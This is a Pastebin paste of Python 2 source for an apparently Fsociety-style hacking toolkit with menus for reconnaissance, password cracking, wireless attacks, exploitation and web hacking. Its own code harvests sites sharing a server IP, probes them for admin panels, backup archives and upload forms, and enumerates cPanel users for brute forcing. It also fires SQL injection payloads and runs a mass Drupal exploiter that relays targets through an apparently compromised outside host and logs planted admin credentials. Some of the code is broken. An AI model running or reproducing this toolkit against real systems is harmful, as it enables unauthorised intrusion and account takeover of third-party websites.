API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 9th, 2017
309
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 39.56 KB | None | 0 0
raw download clone embed print report
  1.  
  2. Select from the menu:
  3.  
  4. 1 : Information Gathering
  5. 2 : Password Attacks
  6. 3 : Wireless Testing
  7. 4 : Exploitation Tools
  8. 5 : Sniffing & Spoofing
  9. 6 : Web Hacking
  10. 7 : Privat Tools
  11. 99 : Exit
  12.  
  13. """)
  14. choice = raw_input("Enter Your Choice:")
  15.  
  16. if choice == "1":
  17. info()
  18. elif choice == "2":
  19. passwd()
  20. elif choice == "3":
  21. wire()
  22. elif choice == "4":
  23. exp()
  24. elif choice == "5":
  25. snif()
  26. elif choice == "6":
  27. webhack()
  28. elif choice == "7":
  29. tnn()
  30. elif choice == "99":
  31. clearScr(),sys.exit();
  32. elif choice == "":
  33. menu()
  34. else:
  35. menu()
  36. def h2ip():
  37. host = raw_input("Select A Host : ")
  38. ips = socket.gethostbyname(host)
  39. print(ips)
  40. def ports():
  41. clearScr()
  42. target = raw_input('Select a Target IP :')
  43. os.system("nmap -O -Pn %s" % target)
  44. sys.exit();
  45. def ifinurl():
  46. print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found."""
  47. print('do you have Inurlbr installed ? ')
  48. cinurl = raw_input("Y / N : ")
  49. if cinurl in yes:
  50. inurl()
  51. if cinurl in no:
  52. menu()
  53. elif cinurl == "":
  54. menu()
  55. else:
  56. menu()
  57. def commix():
  58. print ("Automated All-in-One OS Command Injection and Exploitation Tool.")
  59. print ("usage : python commix.py --help")
  60. choicecmx = raw_input("Continue: y/n :")
  61. if choicecmx in yes:
  62. os.system("git clone https://github.com/stasinopoulos/commix.git commix")
  63. elif choicecmx in no:
  64. os.system('clear'); info()
  65.  
  66. def pixiewps():
  67. print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
  68. """
  69. choicewps = raw_input("Continue ? Y/N : ")
  70. if choicewps in yes :
  71. os.system("git clone https://github.com/wiire/pixiewps.git")
  72. os.system(" cd pixiewps/src & make ")
  73. os.system(" cd pixiewps/src & sudo make install")
  74. if choicewps in no :
  75. menu()
  76. elif choicewps == "":
  77. menu()
  78. else:
  79. menu()
  80. def webhack():
  81. print("1 : Drupal Hacking ")
  82. print("2 : Inurlbr")
  83. print("3 : Wordpress & Joomla Scanner")
  84. print("4 : Gravity Form Scanner")
  85. print("5 : File Upload Checker")
  86. print("6 : Wordpress Exploit Scanner")
  87. print("99 : Exit")
  88. choiceweb = raw_input("Enter Your Choice : ")
  89. if choiceweb == "1":
  90. clearScr()
  91. maine()
  92. if choiceweb == "2":
  93. clearScr(); ifinurl()
  94. if choiceweb =='3':
  95. clearScr(); wppjmla()
  96. if choiceweb =="4":
  97. clearScr(); gravity()
  98. if choiceweb =="5":
  99. clearScr(); sqlscan()
  100. if choiceweb =="6":
  101. clearScr(); wpminiscanner()
  102. elif choiceweb =="99":
  103. menu()
  104. elif choiceweb == "":
  105. menu()
  106. else:
  107. menu()
  108. def inurl():
  109. dork = raw_input("select a Dork:")
  110. output = raw_input("select a file to save :")
  111. os.system("./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
  112. if cinurl in no:
  113. insinurl()
  114. elif cinurl == "":
  115. menu()
  116. else:
  117. menu()
  118. def insinurl():
  119. os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
  120. os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
  121. os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
  122. os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php")
  123. clearScr()
  124. inurl()
  125. def nmap():
  126.  
  127. choice7 = raw_input("continue ? Y / N : ")
  128. if choice7 in yes :
  129. os.system("wget https://nmap.org/dist/nmap-7.01.tar.bz2")
  130. os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -")
  131. os.system("cd nmap-7.01 & ./configure")
  132. os.system("cd nmap-7.01 & make")
  133. os.system("su root")
  134. os.system("cd nmap-7.01 & make install")
  135. elif choice7 in no :
  136. info()
  137. elif choice7 == "":
  138. menu()
  139. else:
  140. menu()
  141. def jboss():
  142. os.system('clear')
  143. print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
  144. print ("deployed, the script uses its upload and command execution capability to")
  145. print ("provide an interactive session.")
  146. print ("")
  147. print ("usage : ./e.sh target_ip tcp_port ")
  148. print("Continue: y/n")
  149. choice9 = raw_input("yes / no :")
  150. if choice9 in yes:
  151. os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git"),sys.exit();
  152. elif choice9 in no:
  153. os.system('clear'); exp()
  154. elif choice9 == "":
  155. menu()
  156. else:
  157. menu()
  158. def sqlmap():
  159. print ("usage : python sqlmap.py -h")
  160. choice8 = raw_input("Continue: y/n :")
  161. if choice8 in yes:
  162. os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ")
  163. elif choice8 in no:
  164. os.system('clear'); info()
  165. elif choice8 == "":
  166. menu()
  167. else:
  168. menu()
  169. def setoolkit():
  170. print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
  171. print(") designed for social engineering. SET has a number of custom attack vectors that ")
  172. print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ")
  173. print("an information security consulting firm located in Cleveland, Ohio.")
  174. print("")
  175. choiceset = raw_input("y / n :")
  176. if choiceset in yes:
  177. os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git")
  178. os.system("python social-engineer-toolkit/setup.py")
  179. if choiceset in no:
  180. clearScr(); info()
  181. elif choiceset == "":
  182. menu()
  183. else:
  184. menu()
  185. def cupp():
  186. print("cupp is a password list generator ")
  187. print("Usage: python cupp.py -h")
  188. choicecupp = raw_input("Continue: y/n : ")
  189.  
  190. if choicecupp in yes:
  191. os.system("git clone https://github.com/Mebus/cupp.git")
  192. print("file downloaded successfully")
  193. elif choicecupp in no:
  194. clearScr(); passwd()
  195. elif choicecupp == "":
  196. menu()
  197. else:
  198. menu()
  199. def ncrack():
  200. print("A Ruby interface to Ncrack, Network authentication cracking tool.")
  201. print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
  202. print("Continue: y/n")
  203. choicencrack = raw_input("y / n :")
  204. if choicencrack in yes:
  205. os.system("git clone https://github.com/sophsec/ruby-ncrack.git")
  206. os.system("cd ruby-ncrack")
  207. os.system("install ruby-ncrack")
  208. elif choicencrack in no:
  209. clearScr(); passwd()
  210. elif choicencrack == "":
  211. menu()
  212. else:
  213. menu()
  214. def reaver():
  215. print """
  216. Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
  217. WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
  218. wide variety of access points and WPS implementations
  219. 1 to accept / 0 to decline
  220. """
  221. creaver = raw_input("y / n :")
  222. if creaver in yes:
  223. os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
  224. os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
  225. os.system("cd reaver-wps-fork-t6x/src/ & ./configure")
  226. os.system("cd reaver-wps-fork-t6x/src/ & make")
  227. elif creaver in no:
  228. clearScr(); wire()
  229. elif creaver == "":
  230. menu()
  231. else:
  232. menu()
  233. def ssls():
  234. print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
  235. attacks.
  236. It requires Python 2.5 or newer, along with the 'twisted' python module."""
  237. cssl = raw_input("y / n :")
  238. if cssl in yes:
  239. os.system("git clone https://github.com/moxie0/sslstrip.git")
  240. os.system("sudo apt-get install python-twisted-web")
  241. os.system("python sslstrip/setup.py")
  242. if cssl in no:
  243. snif()
  244. elif cssl =="":
  245. menu()
  246. else:
  247. menu()
  248. def unique(seq):
  249. seen = set()
  250. return [seen.add(x) or x for x in seq if x not in seen]
  251. def bing_all_grabber(s):
  252.  
  253. lista = []
  254. page = 1
  255. while page <= 101:
  256. try:
  257. bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
  258. openbing = urllib2.urlopen(bing)
  259. readbing = openbing.read()
  260. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  261. for i in range(len(findwebs)):
  262. allnoclean = findwebs[i]
  263. findall1 = re.findall('http://(.*?)/', allnoclean)
  264. for idx, item in enumerate(findall1):
  265. if 'www' not in item:
  266. findall1[idx] = 'http://www.' + item + '/'
  267. else:
  268. findall1[idx] = 'http://' + item + '/'
  269. lista.extend(findall1)
  270.  
  271. page += 50
  272. except urllib2.URLError:
  273. pass
  274.  
  275. final = unique(lista)
  276. return final
  277. def check_gravityforms(sites) :
  278. import urllib
  279. gravityforms = []
  280. for site in sites :
  281. try :
  282. if urllib.urlopen(site+'wp-content/plugins/gravityforms/gravityforms.php').getcode() == 403 :
  283. gravityforms.append(site)
  284. except :
  285. pass
  286.  
  287. return gravityforms
  288. def gravity():
  289. ip = raw_input('Enter IP : ')
  290. sites = bing_all_grabber(str(ip))
  291. gravityforms = check_gravityforms(sites)
  292. for ss in gravityforms :
  293. print ss
  294.  
  295. print '\n'
  296. print '[*] Found, ', len(gravityforms), ' gravityforms.'
  297. def shellnoob():
  298. print """Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part, and use ShellNoob!"""
  299. cshell = raw_input("Y / N : ")
  300. if cshell in yes:
  301. os.system("git clone https://github.com/reyammer/shellnoob.git")
  302. os.system("mv shellnoob/shellnoob.py shellnoob.py")
  303. os.system("sudo python shellnoob.py --install")
  304. if cshell in no:
  305. exp()
  306. elif cshell =="":
  307. menu()
  308. else:
  309. menu()
  310. def info():
  311. print("1: nmap ")
  312. print("2: Setoolkit")
  313. print("3: Port Scanning")
  314. print("4: Host To IP")
  315. print("99: Back To Main Menu")
  316. choice2 = raw_input("Select from the menu:")
  317. if choice2 == "1":
  318. os.system('clear'); nmap()
  319. if choice2 == "2":
  320. clearScr(); setoolkit()
  321. if choice2 == "3":
  322. clearScr(); ports()
  323. if choice2 == "4":
  324. clearScr(); h2ip()
  325. elif choice2 =="99":
  326. clearScr(); menu()
  327. elif choice2 == "":
  328. menu()
  329. else:
  330. menu()
  331. def priv8():
  332. tnn()
  333. def passwd():
  334. print("1: cupp ")
  335. print("2: Ncrack")
  336. print("99: Back To Main Menu")
  337. choice3 = raw_input("Select from the menu:")
  338. if choice3 =="1":
  339. clearScr(); cupp()
  340. elif choice3 =="2":
  341. clearScr(); ncrack()
  342. elif choice3 =="99":
  343. clearScr(); menu()
  344. elif choice3 == "":
  345. menu()
  346. else:
  347. menu()
  348. def wire():
  349. print("1 : reaver ")
  350. print("2 : pixiewps")
  351. print("99: Back To The Main Menu")
  352. choice4 = raw_input("Select from the menu:")
  353. if choice4 =="1":
  354. clearScr();reaver()
  355. if choice4 =="2":
  356. clearScr(); pixiewps()
  357. elif choice4 =="99":
  358. menu()
  359. elif choice4 == "":
  360. menu()
  361. else:
  362. menu()
  363. def exp():
  364. print("1 : jboss-autopwn ")
  365. print("2 : sqlmap")
  366. print("3 : Shellnoob")
  367. print("4 : commix")
  368. print("99 : Go Back To Main Menu")
  369. choice5 = raw_input("Select from the menu:")
  370. if choice5 =="2":
  371. clearScr(); sqlmap()
  372. if choice5 =="1":
  373. os.system('clear'); jboss()
  374. if choice5 =="3":
  375. clearScr(); shellnoob()
  376. if choice5 =="4":
  377. os.system("clear"); commix()
  378. elif choice5 =="99":
  379. menu()
  380. elif choice5 == "":
  381. menu()
  382. else:
  383. menu()
  384. def snif():
  385. print("1 : Setoolkit ")
  386. print("2 : Ssltrip")
  387. print("99: Back To Main Menu")
  388. choice6 = raw_input("Select from the menu:")
  389. if choice6 =="1":
  390. clearScr(); setoolkit()
  391. if choice6 =="2":
  392. clearScr(); ssls()
  393. if choice6 =="99":
  394. clearScr(); menu()
  395. elif choice6 == "":
  396. menu()
  397. else:
  398. menu()
  399. def win():
  400. clearScr()
  401. print("Our Tool Does Not Support Windows , run it on linux or install a virtual machine ")
  402. sys.exit();
  403. #Check use OS
  404. def OS():
  405. print(
  406. """
  407. Choose Operating System :
  408. 1) Mac OSX
  409. 2) Linux
  410. 3) Windows
  411. """)
  412. system = raw_input("choose an OS : ")
  413. if system =="2":
  414. menu()
  415. elif system =="1":
  416. root()
  417. elif system =="3":
  418. win()
  419. elif system == "":
  420. OS()
  421. else:
  422. sys.exit();
  423. def root():
  424. if os.getuid() != 0:
  425. print("Are you root? Please execute as root")
  426. exit()
  427. else:
  428. menu()
  429. menuu = """
  430. 1) Get all websites
  431. 2) Get joomla websites
  432. 3) Get wordpress websites
  433. 4) Find control panel
  434. 5) Find zip files
  435. 6) Find upload files
  436. 7) Get server users
  437. 8) Scan from SQL injection
  438. 9) Scan ports (range of ports)
  439. 10) Scan ports (common ports)
  440. 11) Get server banner
  441. 12) Bypass Cloudflare
  442. 99) Exit
  443. """
  444. def unique(seq):
  445. """
  446. get unique from list found it on stackoverflow
  447. """
  448. seen = set()
  449. return [seen.add(x) or x for x in seq if x not in seen]
  450. def clearScr() :
  451. """
  452. clear the screen in case of GNU/Linux or
  453. windows
  454. """
  455. if system() == 'Linux':
  456. os.system('clear')
  457. if system() == 'Windows':
  458. os.system('cls')
  459. class TNscan : #TNscan Function menu
  460. def __init__(self, serverip) :
  461. self.serverip = serverip
  462. self.getSites(False)
  463. print menuu
  464. while True :
  465. choice = raw_input(' Enter choice -> ')
  466. if choice == '1' :
  467. self.getSites(True)
  468. elif choice == '2' :
  469. self.getJoomla()
  470. elif choice == '3' :
  471. self.getWordpress()
  472. elif choice == '4' :
  473. self.findPanels()
  474. elif choice == '5' :
  475. self.findZip()
  476. elif choice == '6' :
  477. self.findUp()
  478. elif choice == '7' :
  479. self.getUsers()
  480. elif choice == '8' :
  481. self.grabSqli()
  482. elif choice == '9' :
  483. ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
  484. self.portScanner(1, ran)
  485. elif choice == '10' :
  486. self.portScanner(2, None)
  487. elif choice == '11' :
  488. self.getServerBanner()
  489. elif choice == '12' :
  490. self.cloudflareBypasser()
  491. elif choice == '99' :
  492. menu()
  493. con = raw_input(' Continue [Y/n] -> ')
  494. if con[0].upper() == 'N' :
  495. exit()
  496. else :
  497. clearScr()
  498. print menuu
  499. def getSites(self, a) :
  500. """
  501. get all websites on same server
  502. from bing search
  503. """
  504. lista = []
  505. page = 1
  506. while page <= 101:
  507. try:
  508. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
  509. openbing = urllib2.urlopen(bing)
  510. readbing = openbing.read()
  511. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  512. for i in range(len(findwebs)):
  513. allnoclean = findwebs[i]
  514. findall1 = re.findall('http://(.*?)/', allnoclean)
  515. for idx, item in enumerate(findall1):
  516. if 'www' not in item:
  517. findall1[idx] = 'http://www.' + item + '/'
  518. else:
  519. findall1[idx] = 'http://' + item + '/'
  520. lista.extend(findall1)
  521.  
  522. page += 50
  523. except urllib2.URLError:
  524. pass
  525. self.sites = unique(lista)
  526. if a :
  527. clearScr()
  528. print '[*] Found ', len(lista), ' Website\n'
  529. for site in self.sites :
  530. print site
  531. def getWordpress(self) :
  532. """
  533. get wordpress site using a dork the attacker
  534. may do a password list attack (i did a tool for that purpose check my pastebin)
  535. or scan for common vulnerabilities using wpscan for example (i did a simple tool
  536. for multi scanning using wpscan)
  537. """
  538. lista = []
  539. page = 1
  540. while page <= 101:
  541. try:
  542. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
  543. openbing = urllib2.urlopen(bing)
  544. readbing = openbing.read()
  545. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  546. for i in range(len(findwebs)):
  547. wpnoclean = findwebs[i]
  548. findwp = re.findall('(.*?)\?page_id=', wpnoclean)
  549. lista.extend(findwp)
  550. page += 50
  551. except:
  552. pass
  553. lista = unique(lista)
  554. clearScr()
  555. print '[*] Found ', len(lista), ' Wordpress Website\n'
  556. for site in lista :
  557. print site
  558. def getJoomla(self) :
  559. """
  560. get all joomla websites using
  561. bing search the attacker may bruteforce
  562. or scan them
  563. """
  564. lista = []
  565. page = 1
  566. while page <= 101:
  567. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
  568. openbing = urllib2.urlopen(bing)
  569. readbing = openbing.read()
  570. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  571. for i in range(len(findwebs)):
  572. jmnoclean = findwebs[i]
  573. findjm = re.findall('(.*?)index.php', jmnoclean)
  574. lista.extend(findjm)
  575. page += 50
  576. lista = unique(lista)
  577. clearScr()
  578. print '[*] Found ', len(lista), ' Joomla Website\n'
  579. for site in lista :
  580. print site
  581. ############################
  582. #find admin panels
  583. def findPanels(self) :
  584. """
  585. find panels from grabbed websites
  586. the attacker may do a lot of vulnerabilty
  587. tests on the admin area
  588. """
  589. print "[~] Finding admin panels"
  590. adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
  591. clearScr()
  592. for site in self.sites :
  593. for admin in adminList :
  594. try :
  595. if urllib.urlopen(site + admin).getcode() == 200 :
  596. print "[*] Found admin panel -> ", site + admin
  597. except IOError :
  598. pass
  599. ############################
  600. #find ZIP files
  601. def findZip(self) :
  602. """
  603. find zip files from grabbed websites
  604. it may contain useful informations
  605. """
  606. zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
  607. clearScr()
  608. print "[~] Finding zip file"
  609. for site in self.sites :
  610. for zip1 in zipList :
  611. try:
  612. if urllib.urlopen(site + zip1).getcode() == 200 :
  613. print "[*] Found zip file -> ", site + zip1
  614. except IOError :
  615. pass
  616. ############################
  617. #find upload directories
  618. def findUp(self) :
  619. """
  620. find upload forms from grabbed
  621. websites the attacker may succeed to
  622. upload malicious files like webshells
  623. """
  624. upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
  625. clearScr()
  626. print "[~] Finding Upload"
  627. for site in self.sites :
  628. for up in upList :
  629. try :
  630. if (urllib.urlopen(site + up).getcode() == 200) :
  631. html = urllib.urlopen(site + up).readlines()
  632. for line in html :
  633. if re.findall('type=file', line) :
  634. print "[*] Found upload -> ", site+up
  635. except IOError :
  636. pass
  637. ############################
  638. #find users
  639. def getUsers(self) :
  640. """
  641. get server users using a method found by
  642. iranian hackers , the attacker may
  643. do a bruteforce attack on CPanel, ssh, ftp or
  644. even mysql if it supports remote login
  645. (you can use medusa or hydra)
  646. """
  647. clearScr()
  648. print "[~] Grabbing Users"
  649. userslist = []
  650. for site1 in self.sites :
  651. try:
  652. site = site1
  653. site = site.replace('http://www.', '')
  654. site = site.replace('http://', '')
  655. site = site.replace('.', '')
  656. if '-' in site:
  657. site = site.replace('-', '')
  658. site = site.replace('/', '')
  659. while len(site) > 2:
  660. resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
  661. if 'invalid username' not in resp.lower():
  662. print '\t[*] Found -> ', site
  663. userslist.append(site)
  664. break
  665. else :
  666. print site
  667.  
  668. site = site[:-1]
  669. except:
  670. pass
  671.  
  672. clearScr()
  673. for user in userslist :
  674. print user
  675. ############################
  676. #bypass cloudflare
  677. def cloudflareBypasser(self) :
  678. """
  679. trys to bypass cloudflare i already wrote
  680. in my blog how it works, i learned this
  681. method from a guy in madleets
  682. """
  683. clearScr()
  684. print "[~] Bypassing cloudflare"
  685. subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
  686. for site in self.sites :
  687. site.replace('http://', '')
  688. site.replace('/', '')
  689. try:
  690. ip = socket.gethostbyname(site)
  691. except socket.error:
  692. pass
  693. for sub in subdoms:
  694. doo = sub + '.' + site
  695. print ' [~] Trying -> ', doo
  696. try:
  697. ddd = socket.gethostbyname(doo)
  698. if ddd != ip:
  699. print '[*] Cloudflare bypassed -> ', ddd
  700. break
  701. except socket.error :
  702. pass
  703. ############################
  704. #find the server banner
  705. def getServerBanner(self) :
  706. """
  707. simply gets the server banner
  708. the attacker may benefit from it
  709. like getting the server side software
  710. """
  711. clearScr()
  712. try:
  713. s = 'http://' + self.serverip
  714. httpresponse = urllib.urlopen(s)
  715. print '[*] Server header -> ', httpresponse.headers.getheader('server')
  716. except:
  717. pass
  718. ############################
  719. #greb the sqli
  720. def grabSqli(self) :
  721. """
  722. just grabs all websites in server with php?id= dork
  723. for scanning for error based sql injection
  724. """
  725. page = 1
  726. lista = []
  727. while page <= 101:
  728. try:
  729. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
  730. openbing = urllib2.urlopen(bing)
  731. readbing = openbing.read()
  732. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  733. for i in range(len(findwebs)):
  734. x = findwebs[i]
  735. lista.append(x)
  736. except:
  737. pass
  738. page += 50
  739. lista = unique(lista)
  740. self.checkSqli(lista)
  741. ############################
  742. #scan for sql injection
  743. def checkSqli(self, s):
  744. """
  745. checks for error based sql injection,
  746. most of the codes here are from webpwn3r
  747. project the one who has found an lfi in
  748. yahoo as i remember, you can find a separate
  749. tool in my blog
  750. """
  751. clearScr()
  752. print "[~] Checking SQL injection"
  753. payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
  754. check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
  755. for url in s:
  756. try:
  757. for param in url.split('?')[1].split('&'):
  758. for payload in payloads:
  759. power = url.replace(param, param + payload.strip())
  760. #print power
  761. html = urllib2.urlopen(power).readlines()
  762. for line in html:
  763. checker = re.findall(check, line)
  764. if len(checker) != 0 :
  765. print '[*] SQLi found -> ', power
  766. except:
  767. pass
  768. ############################
  769. ############################
  770. #scan for ports
  771. def portScanner(self, mode, ran) :
  772. """
  773. simple port scanner works with range of ports
  774. or with common ports (al-swisre idea)
  775. """
  776. clearScr()
  777. print "[~] Scanning Ports"
  778. def do_it(ip, port):
  779. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  780. #sock.settimeout(5)
  781. sock = sock.connect_ex((ip,port))
  782. if sock == 0:
  783. print "[*] Port %i is open" % port
  784.  
  785. if mode == 1 :
  786. a = ran.split('-')
  787. start = int(a[0])
  788. end = int(a[1])
  789. for i in range(start, end):
  790. do_it(self.serverip, i)
  791. elif mode == 2 :
  792. for port in [80,21,22,2082,25,53,110,443,143] :
  793. # didn't use multithreading cos it's few ports
  794. do_it(self.serverip, port)
  795. ############################
  796. minu ='''
  797. \t 1: Drupal Bing Exploiter
  798. \t 2: Get Drupal Websites
  799. \t 3: Drupal Mass Exploiter
  800. \t 99: Back To Main Menu
  801. '''
  802.  
  803.  
  804. #Definition Of Drupal Bing Expoliter
  805. def drupal():
  806.  
  807. '''Drupal Exploit Binger All Websites Of server '''
  808. ip = raw_input('1- IP : ')
  809. page = 1
  810. while page <= 50 :
  811.  
  812. url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page)
  813. req = urllib2.Request(url)
  814. opreq = urllib2.urlopen(req).read()
  815. findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
  816. page += 1
  817.  
  818. for url in findurl :
  819. try :
  820.  
  821. urlpa = urlparse(url)
  822. site = urlpa.netloc
  823.  
  824. print "[+] Testing At "+site
  825. resp = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+site+'&submit=submit')
  826. read=resp.read()
  827. if "User : HolaKo" in read:
  828. print "Exploit found =>"+site
  829.  
  830. print "user:HolaKo\npass:admin"
  831. a = open('up.txt','a')
  832. a.write(site+'\n')
  833. a.write("user:"+user+"\npass:"+pwd+"\n")
  834. else :
  835. print "[-] Expl Not Found :( "
  836.  
  837. except Exception as ex :
  838. print ex
  839. sys.exit(0)
  840.  
  841.  
  842. #Drupal Server ExtraCtor
  843. def getdrupal():
  844. ip = raw_input('Enter The Ip : ')
  845. page = 1
  846. sites = list()
  847. while page <= 50 :
  848.  
  849. url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page)
  850. req = urllib2.Request(url)
  851. opreq = urllib2.urlopen(req).read()
  852. findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
  853. page += 1
  854.  
  855. for url in findurl :
  856. split = urlparse(url)
  857. site = split.netloc
  858. if site not in sites :
  859. print site
  860. sites.append(site)
  861.  
  862.  
  863. #Drupal Mass List Exploiter
  864. def drupallist():
  865. listop = raw_input("Enter The list Txt :")
  866. fileopen = open(listop,'r')
  867. content = fileopen.readlines()
  868. for i in content :
  869. url=i.strip()
  870. try :
  871. openurl = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+url+'&submit=submit')
  872. readcontent = openurl.read()
  873. if "Success" in readcontent :
  874. print "[+]Success =>"+url
  875. print "[-]username:HolaKo\n[-]password:admin"
  876. save = open('drupal.txt','a')
  877. save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n")
  878.  
  879. else :
  880. print i + "=> exploit not found "
  881. except Exception as ex :
  882. print ex
  883. def maine():
  884.  
  885. print minu
  886. choose = raw_input("choose a number :")
  887. while True :
  888.  
  889. if choose == "1":
  890. drupal()
  891. if choose == "2":
  892. getdrupal()
  893. if choose == "3":
  894. drupallist()
  895. if choose == "4":
  896. about()
  897. if choose == "99":
  898.  
  899. menu()
  900. con = raw_input('Continue [Y/n] -> ')
  901. if con[0].upper() == 'N' :
  902. exit()
  903. if con[0].upper() == 'Y' :
  904. maine()
  905. def unique(seq):
  906. seen = set()
  907. return [seen.add(x) or x for x in seq if x not in seen]
  908. def bing_all_grabber(s):
  909. lista = []
  910. page = 1
  911. while page <= 101:
  912. try:
  913. bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
  914. openbing = urllib2.urlopen(bing)
  915. readbing = openbing.read()
  916. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  917. for i in range(len(findwebs)):
  918. allnoclean = findwebs[i]
  919. findall1 = re.findall('http://(.*?)/', allnoclean)
  920. for idx, item in enumerate(findall1):
  921. if 'www' not in item:
  922. findall1[idx] = 'http://www.' + item + '/'
  923. else:
  924. findall1[idx] = 'http://' + item + '/'
  925. lista.extend(findall1)
  926.  
  927. page += 50
  928. except urllib2.URLError:
  929. pass
  930.  
  931. final = unique(lista)
  932. return final
  933. def check_wordpress(sites) :
  934. wp = []
  935. for site in sites :
  936. try :
  937. if urllib2.urlopen(site+'wp-login.php').getcode() == 200 :
  938. wp.append(site)
  939. except :
  940. pass
  941.  
  942. return wp
  943. def check_joomla(sites) :
  944. joomla = []
  945. for site in sites :
  946. try :
  947. if urllib2.urlopen(site+'administrator').getcode() == 200 :
  948. joomla.append(site)
  949. except :
  950. pass
  951.  
  952. return joomla
  953. def wppjmla():
  954.  
  955. ipp = raw_input('Enter Target IP: ')
  956. sites = bing_all_grabber(str(ipp))
  957. wordpress = check_wordpress(sites)
  958. joomla = check_joomla(sites)
  959. for ss in wordpress :
  960. print ss
  961. print '[+] Found ! ', len(wordpress), ' Wordpress Websites'
  962. print '-'*30+'\n'
  963. for ss in joomla :
  964. print ss
  965.  
  966.  
  967. print '[+] Found ! ', len(joomla), ' Joomla Websites'
  968.  
  969. print '\n'
  970. #initialise the tnscan function
  971. class tnn():
  972. def __init__(self):
  973. clearScr()
  974. aaa = raw_input("Target IP : ")
  975. TNscan(aaa)
  976. ############################
  977. class bcolors:
  978. HEADER = ''
  979. OKBLUE = ''
  980. OKGREEN = ''
  981. WARNING = ''
  982. FAIL = ''
  983. ENDC = ''
  984. CYAN = ''
  985. class colors():
  986. PURPLE = ''
  987. CYAN = ''
  988. DARKCYAN = ''
  989. BLUE = ''
  990. GREEN = ''
  991. YELLOW = ''
  992. RED = ''
  993. BOLD = ''
  994. ENDC = ''
